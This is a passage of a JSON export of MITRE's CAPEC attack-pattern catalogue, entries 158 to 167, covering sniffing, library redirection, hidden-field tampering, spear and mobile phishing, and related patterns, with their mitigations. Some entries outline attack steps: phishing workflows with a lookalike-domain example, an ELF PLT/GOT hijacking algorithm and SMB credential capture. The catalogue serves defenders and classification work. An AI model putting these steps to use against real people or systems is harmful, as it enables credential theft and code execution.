Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description"}]}},"158":{"ID":"158","Name":"Sniffing Network Traffic","Abstraction":"Detailed","Status":"Draft","Description":"In this attack pattern, the adversary monitors network traffic between nodes of a public or multicast network in an attempt to capture sensitive information at the protocol level. Network sniffing applications can reveal TCP/IP, DNS, Ethernet, and other low-level network communication information. The adversary takes a passive role in this attack pattern and simply observes and analyzes the traffic. The adversary may precipitate or indirectly influence the content of the observed transaction, but is never the intended recipient of the target information.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"157"}},"Prerequisites":{"Prerequisite":["The target must be communicating on a network protocol visible by a network sniffing application.","The adversary must obtain a logical position on the network from intercepting target network traffic is possible. Depending on the network topology, traffic sniffing may be simple or challenging. If both the target sender and target recipient are members of a single subnet, the adversary must also be on that subnet in order to see their traffic communication."]},"Skills_Required":{"Skill":["Adversaries can obtain and set up open-source network sniffing tools easily.",{"Level":"Low"}]},"Resources_Required":{"Resource":"A tool with the capability of presenting network communication traffic (e.g., Wireshark, tcpdump, Cain and Abel, etc.)."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["Obfuscate network traffic through encryption to prevent its readability by network sniffers.","Employ appropriate levels of segmentation to your network in accordance with best practices."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"311"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1040","Entry_Name":"Network Sniffing"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Activation_Zone, Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Resources_Required, Solutions_and_Mitigations"}]}},"159":{"ID":"159","Name":"Redirect Access to Libraries","Abstraction":"Standard","Status":"Stable","Description":"An adversary exploits a weakness in the way an application searches for external libraries to manipulate the execution flow to point to an adversary supplied library or code base. This pattern of attack allows the adversary to compromise the application or server via the execution of unauthorized code. An application typically makes calls to functions that are a part of libraries external to the application. These libraries may be part of the operating system or they may be third party libraries. If an adversary can redirect an application\'s attempts to access these libraries to other libraries that the adversary supplies, the adversary will be able to force the targeted application to execute arbitrary code. This is especially dangerous if the targeted application has enhanced privileges. Access can be redirected through a number of techniques, including the use of symbolic links, search path modification, and relative path manipulation.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"154","Exclude_Related":[{"Exclude_ID":"403"},{"Exclude_ID":"512"},{"Exclude_ID":"515"}]},{"Nature":"CanPrecede","CAPEC_ID":"185"}]},"Prerequisites":{"Prerequisite":"The target must utilize external libraries and must fail to verify the integrity of these libraries before using them."},"Skills_Required":{"Skill":["To modify the entries in the configuration file pointing to malicious libraries",{"Level":"Low"},"To force symlink and timing issues for redirecting access to libraries",{"Level":"Medium"},"To reverse engineering the libraries and inject malicious code into the libraries",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Implementation: Restrict the permission to modify the entries in the configuration file.","Implementation: Check the integrity of the dynamically linked libraries before use them.","Implementation: Use obfuscation and other techniques to prevent reverse engineering the libraries."]},"Example_Instances":{"Example":"In this example, the attacker using ELF infection that redirects the Procedure Linkage Table (PLT) of an executable allowing redirection to be resident outside of the infected executable. The algorithm at the entry point code is as follows... \u2022 mark the text segment writeable \u2022 save the PLT(GOT) entry \u2022 replace the PLT(GOT) entry with the address of the new lib call The algorithm in the new library call is as follows... \u2022 do the payload of the new lib call \u2022 restore the original PLT(GOT) entry \u2022 call the lib call \u2022 save the PLT(GOT) entry again (if its changed) \u2022 replace the PLT(GOT) entry with the address of the new lib call"},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"706"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.008","Entry_Name":"Hijack Execution Flow:Path Interception by Search Order Hijacking"}},"References":{"Reference":[{"External_Reference_ID":"REF-29"},{"External_Reference_ID":"REF-30","Section":"OWASP Top 10 2007 A3 \u2013 Malicious File Execution"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, Description, Description Summary, References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"}]}},"160":{"ID":"160","Name":"Exploit Script-Based APIs","Abstraction":"Standard","Status":"Draft","Description":"Some APIs support scripting instructions as arguments. Methods that take scripted instructions (or references to scripted instructions) can be very flexible and powerful. However, if an attacker can specify the script that serves as input to these methods they can gain access to a great deal of functionality. For example, HTML pages support <script> tags that allow scripting languages to be embedded in the page and then interpreted by the receiving web browser. If the content provider is malicious, these scripts can compromise the client application. Some applications may even execute the scripts under their own identity (rather than the identity of the user providing the script) which can allow attackers to perform activities that would otherwise be denied to them.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"113","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify API] Discover an API of interest by exploring application documentation or observing responses to API calls","Technique":"Search via internet for known, published APIs that support scripting instructions as arguments"},{"Step":"2","Phase":"Experiment","Description":"[Test simple script] Adversaries will attempt to give a smaller script as input to the API, such as simply printing to the console, to see if the attack is viable.","Technique":"Create a general script to be taken as input by the API"},{"Step":"3","Phase":"Exploit","Description":"[Give malicious scripting instructions to API] Adversaries will now craft custom scripts to do malicious behavior. Depending on the setup of the application this script could be run with user or admin level priveleges.","Technique":"Crafting a malicious script to be run on a system based on priveleges and capabilities of the system"}]},"Prerequisites":{"Prerequisite":["The target application must include the use of APIs that execute scripts.","The target application must allow the attacker to provide some or all of the arguments to one of these script interpretation methods and must fail to adequately filter these arguments for dangerous or unwanted script commands."]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"346"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["Programming to included script-based APIs",{"Date":"2015-12-07"}]}},"161":{"ID":"161","Name":"Infrastructure Manipulation","Abstraction":"Meta","Status":"Draft","Description":"An attacker exploits characteristics of the infrastructure of a network entity in order to perpetrate attacks or information gathering on network objects or effect a change in the ordinary information flow between network objects. Most often, this involves manipulation of the routing of network messages so, instead of arriving at their proper destination, they are directed towards an entity of the attackers\' choosing, usually a server controlled by the attacker. The victim is often unaware that their messages are not being processed correctly. For example, a targeted client may believe they are connecting to their own bank but, in fact, be connecting to a Pharming site controlled by the attacker which then collects the user\'s login information in order to hijack the actual bank account.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"CanPrecede","CAPEC_ID":"664"}},"Prerequisites":{"Prerequisite":"The targeted client must access the site via infrastructure that the attacker has co-opted and must fail to adequately verify that the communication channel is operating correctly (e.g. by verifying that they are, in fact, connected to the site they intended.)"},"Resources_Required":{"Resource":"The attacker must be able to corrupt the infrastructure used by the client. For some variants of this attack, the attacker must be able to stand up their own services that mimic the services the targeted client intends to use."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"162":{"ID":"162","Name":"Manipulating Hidden Fields","Abstraction":"Detailed","Status":"Draft","Description":"An adversary exploits a weakness in the server\'s trust of client-side processing by modifying data on the client-side, such as price information, and then submitting this data to the server, which processes the modified data. For example, eShoplifting is a data manipulation attack against an on-line merchant during a purchasing transaction. The manipulation of price, discount or quantity fields in the transaction message allows the adversary to acquire items at a lower cost than the merchant intended. The adversary performs a normal purchasing transaction but edits hidden fields within the HTML form response that store price or other information to give themselves a better deal. The merchant then uses the modified pricing information in calculating the cost of the selected items.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"77"}},"Prerequisites":{"Prerequisite":["The targeted site must contain hidden fields to be modified.","The targeted site must not validate the hidden fields with backend processing."]},"Resources_Required":{"Resource":"The adversary must have the ability to modify hidden fields by editing the HTTP response to the server."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"602"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Resources_Required"}],"Previous_Entry_Name":["Manipulating hidden fields to change the normal flow of transactions (eShoplifting)",{"Date":"2015-12-07"}]}},"163":{"ID":"163","Name":"Spear Phishing","Abstraction":"Detailed","Status":"Draft","Description":"An adversary targets a specific user or group with a Phishing (CAPEC-98) attack tailored to a category of users in order to have maximum relevance and deceptive capability. Spear Phishing is an enhanced version of the Phishing attack targeted to a specific user or group. The quality of the targeted email is usually enhanced by appearing to come from a known or trusted entity. If the email account of some trusted entity has been compromised the message may be digitally signed. The message will contain information specific to the targeted users that will enhance the probability that they will follow the URL to the compromised site. For example, the message may indicate knowledge of the targets employment, residence, interests, or other information that suggests familiarity. As soon as the user follows the instructions in the message, the attack proceeds as a standard Phishing attack.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"98"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Obtain useful contextual detailed information about the targeted user or organization] An adversary collects useful contextual detailed information about the targeted user or organization in order to craft a more deceptive and enticing message to lure the target into responding.","Technique":["Conduct web searching research of target. See also: CAPEC-118.","Identify trusted associates, colleagues and friends of target. See also: CAPEC-118.","Utilize social engineering attack patterns such as Pretexting. See also: CAPEC-407.","Collect social information via dumpster diving. See also: CAPEC-406.","Collect social information via traditional sources. See also: CAPEC-118.","Collect social information via Non-traditional sources. See also: CAPEC-118."]},{"Step":"2","Phase":"Experiment","Description":"[Optional: Obtain domain name and certificate to spoof legitimate site] This optional step can be used to help the adversary impersonate the legitimate site more convincingly. The adversary can use homograph attacks to convince users that they are using the legitimate website. Note that this step is not required for phishing attacks, and many phishing attacks simply supply URLs containing an IP address and no SSL certificate.","Technique":["Optionally obtain a domain name that visually looks similar to the legitimate site\'s domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L).","Optionally obtain a legitimate SSL certificate for the new domain name."]},{"Step":"3","Phase":"Experiment","Description":"[Optional: Explore legitimate website and create duplicate] An adversary creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the website that they are trying to impersonate. That website will typically have a login form for the victim to put in their authentication credentials. There can be different variations on a theme here.","Technique":["Use spidering software to get copy of web pages on legitimate site.","Manually save copies of required web pages from legitimate site.","Create new web pages that have the legitimate site\'s look at feel, but contain completely new content."]},{"Step":"4","Phase":"Experiment","Description":"[Optional: Build variants of the website with very specific user information e.g., living area, etc.] Once the adversary has their website which duplicates a legitimate website, they need to build very custom user related information in it. For example, they could create multiple variants of the website which would target different living area users by providing information such as local news, local weather, etc. so that the user believes this is a new feature from the website.","Technique":"Integrate localized information in the web pages created to duplicate the original website. Those localized information could be dynamically generated based on unique key or IP address of the future victim."},{"Step":"5","Phase":"Exploit","Description":"[Convince user to enter sensitive information on adversary\'s site.] An adversary sends a message (typically an e-mail) to the victim that has some sort of a call to action to get the user to click on the link included in the e-mail (which takes the victim to adversary\'s website) and log in. The key is to get the victim to believe that the message is coming from a legitimate entity trusted by the victim or with which the victim or does business and that the website pointed to by the URL in the e-mail is the legitimate website. A call to action will usually need to sound legitimate and urgent enough to prompt action from the user.","Technique":["Send the user a message from a spoofed legitimate-looking e-mail address that asks the user to click on the included link.","Place phishing link in post to online forum."]},{"Step":"6","Phase":"Exploit","Description":"[Use stolen credentials to log into legitimate site] Once the adversary captures some sensitive information through phishing (login credentials, credit card information, etc.) the adversary can leverage this information. For instance, the adversary can use the victim\'s login credentials to log into their bank account and transfer money to an account of their choice.","Technique":"Log in to the legitimate site using another user\'s supplied credentials."}]},"Prerequisites":{"Prerequisite":"None. Any user can be targeted by a Spear Phishing attack."},"Skills_Required":{"Skill":["Spear phishing attacks require specific knowledge of the victims being targeted, such as which bank is being used by the victims, or websites they commonly log into (Google, Facebook, etc).",{"Level":"Medium"}]},"Resources_Required":{"Resource":"An adversay must have the ability communicate their phishing scheme to the victims (via email, instance message, etc.), as well as a website or other platform for victims to enter personal information into."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data","Note":"Information Leakage"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges","Note":"Privilege Escalation"},{"Scope":"Integrity","Impact":"Modify Data","Note":"Data Modification"}]},"Mitigations":{"Mitigation":"Do not follow any links that you receive within your e-mails and certainly do not input any login credentials on the page that they take you too. Instead, call your Bank, PayPal, eBay, etc., and inquire about the problem. A safe practice would also be to type the URL of your bank in the browser directly and only then log in. Also, never reply to any e-mails that ask you to provide sensitive information of any kind."},"Example_Instances":{"Example":["The target gets an official looking e-mail from their bank stating that their account has been temporarily locked due to suspected unauthorized activity that happened in a different area from where they live (details might be provided by the spear phishers) and that they need to click on the link included in the e-mail to log in to their bank account in order to unlock it. The link in the e-mail looks very similar to that of their bank and once the link is clicked, the log in page is the exact replica. The target supplies their login credentials after which they are notified that their account has now been unlocked and that everything is fine. An adversary has just collected the target\'s online banking information which can now be used by them to log into the target\'s bank account and transfer money to a bank account of the adversary\'s choice.","An adversary can leverage a weakness in the SMB protocol by sending the target, an official looking e-mail from their employer\'s IT Department stating that their system has vulnerable software, which they need to manually patch by accessing an updated version of the software by clicking on a provided link to a network share. Once the link is clicked, the target is directed to an external server controlled by the adversary or to a malicious file on a public access share. The SMB protocol will then attempt to authenticate the target to the adversary controlled server, which allows the adversary to capture the hashed credentials over SMB. These credentials can then be used to execute offline brute force attacks or a \\"Pass The Hash\\" attack."]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1534","Entry_Name":"Internal Spearfishing"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1566.001","Entry_Name":"Phishing:Spearfishing Attachment"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1566.002","Entry_Name":"Phishing:Spearfishing Link"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1566.003","Entry_Name":"Phishing:Spearfishing via Service"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Example_Instances, Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"164":{"ID":"164","Name":"Mobile Phishing","Abstraction":"Detailed","Status":"Stable","Description":"An adversary targets mobile phone users with a phishing attack for the purpose of soliciting account passwords or sensitive information from the user. Mobile Phishing is a variation of the Phishing social engineering technique where the attack is initiated via a text or SMS message, rather than email. The user is enticed to provide information or visit a compromised web site via this message. Apart from the manner in which the attack is initiated, the attack proceeds as a standard Phishing attack.","Alternate_Terms":{"Alternate_Term":[{"Term":"Smishing"},{"Term":"MobPhishing"}]},"Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"98"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Obtain domain name and certificate to spoof legitimate site] This optional step can be used to help the adversary impersonate the legitimate site more convincingly. The adversary can use homograph or similar attacks to convince users that they are using the legitimate website. Note that this step is not required for phishing attacks, and many phishing attacks simply supply URLs containing an IP address and no SSL certificate.","Technique":["Optionally obtain a domain name that visually looks similar to the legitimate site\'s domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L)","Optionally obtain a legitimate SSL certificate for the new domain name."]},{"Step":"2","Phase":"Explore","Description":"[Explore legitimate website and create duplicate] An adversary creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the website that they are trying to impersonate. That website will typically have a login form for the victim to put in their authentication credentials. There can be different variations on a theme here.","Technique":["Use spidering software to get copy of web pages on legitimate site.","Manually save copies of required web pages from legitimate site.","Create new web pages that have the legitimate site\'s look and feel, but contain completely new content."]},{"Step":"3","Phase":"Exploit","Description":"[Convince user to enter sensitive information on adversary\'s site.] An adversary sends a text message to the victim that has a call-to-action, in order to persuade the user into clicking the included link (which then takes the victim to the adversary\'s website) and logging in. The key is to get the victim to believe that the text message originates from a legitimate entity with which the victim does business and that the website pointed to by the URL in the text message is the legitimate website. A call-to-action will usually need to sound legitimate and urgent enough to prompt action from the user.","Technique":"Send the user a message from a spoofed legitimate-looking mobile number that asks the user to click on the included link."},{"Step":"4","Phase":"Exploit","Description":"[Use stolen credentials to log into legitimate site] Once the adversary captures some sensitive information through phishing (login credentials, credit card information, etc.) the adversary can leverage this information. For instance, the adversary can use the victim\'s login credentials to log into their bank account and transfer money to an account of their choice.","Technique":"Log in to the legitimate site using another user\'s supplied credentials"}]},"Prerequisites":{"Prerequisite":["An adversary needs mobile phone numbers to initiate contact with the victim.","An adversary needs to correctly guess the entity with which the victim does business and impersonate it. Most of the time phishers just use the most popular banks/services and send out their \\"hooks\\" to many potential victims.","An adversary needs to have a sufficiently compelling call to action to prompt the user to take action.","The replicated website needs to look extremely similar to the original website and the URL used to get to that website needs to look like the real URL of the said business entity."]},"Skills_Required":{"Skill":["Basic knowledge about websites: obtaining them, designing and implementing them, etc.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Either mobile phone or access to a web resource that allows text messages to be sent to mobile phones. Resources needed for regular Phishing attack."},"Indicators":{"Indicator":["You receive a text message from an entity that you are not even a customer of prompting you to log into your account.","You receive any text message that provides you with a link that takes you to a website which requires you to enter your credentials."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":"Do not follow any links that you receive within text messages and do not input any login credentials on the page that they take you too. Instead, call your Bank, PayPal, eBay, etc., and inquire about the problem. Safe practices also include leveraging the entity\'s mobile application or directly typing the entity\'s URL in the browser and only then logging in. Never reply to any text messages that ask you to provide sensitive information of any kind."},"Example_Instances":{"Example":"The target receives a text message stating that their Apple ID has been disabled due to suspicious activity and that they need to click on the link included in the message to log into their Apple account in order to enable it. The link in the text message looks legitimate and once the link is clicked, the login page is an exact replica of Apple\'s standard login page. The target supplies their login credentials and are then notified that their account has now been unlocked. However, the adversary has just collected the target\'s Apple account information, which can now be used by the adversary for a variety of purposes."},"References":{"Reference":[{"External_Reference_ID":"REF-590"},{"External_Reference_ID":"REF-591"},{"External_Reference_ID":"REF-592"},{"External_Reference_ID":"REF-593"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Alternate_Terms"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Status, Alternate_Terms, Consequences, Description, Example_Instances, Execution_Flow, Indicators, Likelihood_Of_Attack, Mitigations, Prerequisites, References, Skills_Required"}],"Previous_Entry_Name":["Mobile Phishing (aka MobPhishing)",{"Date":"2017-01-09"}]}},"165":{"ID":"165","Name":"File Manipulation","Abstraction":"Meta","Status":"Draft","Description":"An attacker modifies file contents or attributes (such as extensions or names) of files in a manner to cause incorrect processing by an application. Attackers use this class of attacks to cause applications to enter unstable states, overwrite or expose sensitive information, and even execute arbitrary code with the application\'s privileges. This class of attacks differs from attacks on configuration information (even if file-based) in that file manipulation causes the file processing to result in non-standard behaviors, such as buffer overflows or use of the incorrect interpreter. Configuration attacks rely on the application interpreting files correctly in order to insert harmful configuration information. Likewise, resource location attacks rely on controlling an application\'s ability to locate files, whereas File Manipulation attacks do not require the application to look in a non-default location, although the two classes of attacks are often combined.","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The target must use the affected file without verifying its integrity."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. In some cases, tools can be used to better control the response of the targeted application to the modified file."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"}]}},"166":{"ID":"166","Name":"Force the System to Reset Values","Abstraction":"Standard","Status":"Draft","Description":"An attacker forces the target into a previous state in order to leverage potential weaknesses in the target dependent upon a prior configuration or state-dependent factors. Even in cases where an attacker may not be able to directly control the configuration of the targeted application, they may be able to reset the configuration to a prior state since many applications implement reset functions. Since these functions are usually intended as emergency features to return an application to a stable configuration if the current configuration degrades functionality, they may not be as strongly secured as other configuration options. The resetting of values is dangerous as it may enable undesired functionality, disable services, or modify access controls. At the very least this is a nuisance attack since the administrator will need to re-apply their configuration. At worst, this attack can open avenues for powerful attacks against the application, and, if it isn\'t obvious that the configuration has been reset, these vulnerabilities may be present a long time before they are notices.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"161","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":["The targeted application must have a reset function that returns the configuration of the application to an earlier state.","The reset functionality must be inadequately protected against use."]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. In some cases, the attacker may need special client applications in order to execute the reset functionality."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"306"},{"CWE_ID":"1221"},{"CWE_ID":"1232"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"167":{"ID":"167","Name":"White Box Reverse Engineering","Abstraction":"Standard","Status":"Draft","Description":"An attacker discovers the structure, function, and composition of a type of computer software through white box analysis techniques. White box techniques involve methods which can be applied to a piece of software when an executable or some other compiled object can be directly subjected to analysis, revealing at least a portion of its machine instructions that can be observed upon execution.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"188"}},"Prerequisites":{"Prerequisite":"Direct access to the object or software."},"Resources_Required":{"Resource":"Reverse engineering of software requires varying tools and methods that enable the decompiling of executable or other compiled objects."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"1323"},{"CWE_ID":"1324"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Activation_Zone, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Related_Attack_Patterns, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["Lifting Sensitive Data from the Client",{"Date":"2015-11-09"}]}},"168":{"ID":"168","Name":"Windows ::DATA Alternate Data 